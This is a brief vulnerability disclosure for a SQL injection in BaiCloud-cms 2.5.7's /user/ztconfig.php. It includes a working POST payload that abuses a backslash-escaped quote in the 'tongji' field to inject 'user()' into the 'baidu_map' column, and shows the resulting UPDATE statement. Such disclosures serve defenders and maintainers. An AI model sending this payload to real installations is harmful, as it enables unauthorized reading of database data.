BaiCloud
BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability
Link Url : https://github.com/meiko-S/BaiCloud
Edition : lastest(2.5.7)
0x01 Vulnerability (/user/ztconfig.php line 65)
after user login then post data
POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1
then get /user/ztconfig.php page can get result

0x20 Analysis
we set tongji = 1\ and baidu_map=,baidu_map=user()#
then the query is
update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';
this is a legal sql statement
and when get this page,we can get this value.